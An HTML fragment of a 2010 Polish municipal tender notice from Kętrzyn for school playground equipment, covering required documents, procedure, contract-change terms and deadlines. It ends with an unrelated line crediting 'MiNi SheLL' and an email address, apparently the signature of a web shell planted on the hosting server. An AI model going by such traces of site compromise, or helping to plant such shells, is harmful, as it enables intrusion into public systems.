<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">prospekty/zdjęcia/rysunki proponowanych urządzeń wyposażenia placów zabaw</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	wypełniony formularz oferty - zał. nr 1 do SIWZ, 
2)	kosztorys ofertowy sporządzony metodą uproszczoną w oparciu o dokumentację projektową,  wizję lokalną w terenie, wszelkie inne czynniki mające wpływ na prawidłowe wykonanie zamówienia; 
3)	zaakceptowany poprzez zaparafowanie każdej strony wzór umowy - zał. nr 6 do SIWZ,
4)	dowód wniesienia wadium</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Wszelkie zmiany wprowadzane do umowy wymagają obustronnej zgody oraz formy pisemnej pod rygorem nieważności z zastrzeżeniem art. 144 ustawy Prawo zamówień publicznych.
2. Strony przewidują możliwość zmiany postanowień niniejszej umowy w następujących przypadkach:
a)	zmiana sposobu fakturowania w przypadku zmian organizacyjnych oraz wewnętrznych uwarunkowań podmiotów wymienionych w preambule umowy,
b)	wystąpienia zdarzeń niezależnych od stron umowy, powodujących potrzebę wprowadzenia do treści umowy zmian neutralnych lub korzystnych dla Zamawiającego, bez zwiększania ustalonego wynagrodzenia,
c)	zmiana kierownika budowy, 
d)	zmiana harmonogramu rzeczowo-finansowego jedynie za uprzednią pisemną zgodą zamawiającego,
e)	zmiany terminu realizacji zamówienia:
- ze względu na niezawinione przyczyny spowodowane przez tzw. siłę wyższą ,
- względy organizacyjne leżące po stronie Zamawiającego skutkujące koniecznością zmiany terminu realizacji zamówienia,
- realizacja przedmiotu umowy wymaga uzyskania stosownych dokumentów z urzędów administracji państwowej,  a z przyczyn niezależnych od Stron niemożliwe  było ich uzyskanie w terminach przewidzianych w przepisach prawa, 
- wystąpienie niekorzystnych warunków atmosferycznych uniemożliwiających prowadzenie robót zgodnie z ich technologią i warunkami technicznymi zapewniającymi właściwą jakość wykonania, albo innych zdarzeń wymuszających przerwę w realizacji zamówienia niezależnych od Wykonawcy - fakt ten musi mieć odzwierciedlenie w dzienniku budowy i musi być potwierdzony przez inspektora nadzoru, ( nie uważa się za czynnik zakłócający wpływ czynników atmosferycznych w czasie realizacji robót, który przy składaniu ofert musi być normalnie brany pod uwagę) 
f)	zmiany technologii wykonania robót lub rozwiązań technicznych nie przewidzianych w umowie, jeżeli zmiany te będą korzystne dla Zamawiającego. Dopuszcza się je tylko w przypadku, gdy proponowane rozwiązania są równorzędne lub lepsze funkcjonalnie od rozwiązań przyjętych w dokumentacji projektowej będącej podstawą zamówienia,, po akceptacji zmian przez Zamawiającego.
g)	rezygnacji z wykonania części robót budowlanych, nie przekraczających jednak 10 % wynagrodzenia wykonawcy. 
3. W przypadku zmiany terminu wykonania przedmiotu umowy wykonawca, który wniósł zabezpieczenie należytego wykonania umowy w formie innej niż pieniądz zobowiązany jest do przedłużenia terminu jego ważności. 
4. Zmiany umowy, o których mowa w ust. 2  zostaną dokonane na podstawie protokołów zawierających uzasadnienie zmian  podpisanych przez strony oraz wymagają aneksu w formie pisemnej  pod rygorem nieważności i mogą być wprowadzone jedynie w przypadku jeżeli obydwie strony umowy zgodnie uznają, ze zaszły okoliczności oraz wprowadzenie mian jest konieczne dla prawidłowej realizacji zamówienia</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ketrzyn.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Kętrzyn
ul. Wojska Polskiego 11
11-400 Ketrzyn.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.08.2010 godzina 09:00, miejsce: Urząd Miasta Kętrzyn
ul. Wojska Polskiego 11
11-400 Ketrzyn
Biuro podawcze (parter przy wejściu do Urzędu Miasta).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Wykonanie przedmiotu zamówienia dofinansowane jest w ramach Rządowego programu wspierania organów prowadzących w zapewnieniu bezpiecznych warunków nauki, wychowania i opieki w klasach I-III szkół podstawowych i ogólnokształcących szkół muzycznych I stopnia - Radosna szkoła.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com